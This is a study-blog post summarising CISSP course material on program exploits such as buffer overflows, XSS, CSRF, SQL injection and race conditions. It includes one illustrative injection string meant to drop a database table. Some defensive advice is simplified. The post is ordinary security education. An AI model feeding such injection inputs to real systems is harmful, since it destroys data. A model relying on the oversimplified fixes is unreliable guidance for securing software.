Credit: Post based on CISSP course presented by Dennis Lee, November 2018
Ok! Last domain of the CISSP – we have two topics to cover – we’ll cover one today and one next week.
In this post, we’ll cover some common Program Exploits at a high level to get you familiar with terminology.
The first is Memory Buffer Overflow an example is a website form running on a server where the attacker enters a longer string than the program that ingests the form can allow, causing the memory on the server to overflow which can corrupt data, crash the system, or provide access to things the attacker should not have access to. To fix, the programmer must put in validation checking for fields in the website form.
Covert Channel is a secret transfer or sharing of information that violates security. Examples could be a Covert Storage Channel which is a hidden data storage location, or hidden data that an attacker shouldn’t be accessing within a program. A Covert Timing Channel is secret signaling. For example, using screen flicker to exfiltrate data from a facility.
Cross-Site Scripting is a well known attack and is where a malicious user puts comments with a malicious script in a web form. A regular user then picks up content when they load the website in their browser and the comment causes the regular user’s browser to execute the script. This for example, could be used to harvest cookies. A user can safeguard against this by disabling scripting in their browser.
Cross-Site Request Forgery is similar where a user has two browser tabs open. In Tab 1 they might have an image with a reference link or a script with a request action on a specific banking site. In Tab 2, they may have open their banking site. The browser may allow a transaction or activity from Tab 1 to occur on the website in Tab 2 believing it’s legitimate because it’s occurring within the same browser.
Memory or Object Reuse is where you need to sanitize media before reusing it with a protected audit log trail.
Trapdoors / Back-doors / Maintenance Hooks are hidden mechanisms for bypassing access controls. They are put in by programmers – typically for convenience when debugging their code.
SQL Injection is where a front-end form passes input containing SQL code that runs on a back-end database and returns output or runs code. For example, if someone put the following into a "First Name" field of a web form: “Bobby ‘DROP TABLE”, it could cause the database to delete a table from the database if there are no validation checks or neutralization of form entries to cause them to not execute.
A Race Condition Attack is where two signals or processes race each other to influence the output first. A physical representation of this would be two joint bank account owners trying to make a withdrawal from the account at the same time. If the combination of both their withdrawals is larger than the account, the bank may not realize that they have overdrawn their account and allow both of them to complete their withdrawals at the same time.
Time of Check / Time of Use (TOCTOU) is where variables of a system are changed but there’s a delay in when the system honors the changes. The example here is changing your account permissions may not take affect right away or require you to refresh your browser, etc.
Excellent Tips 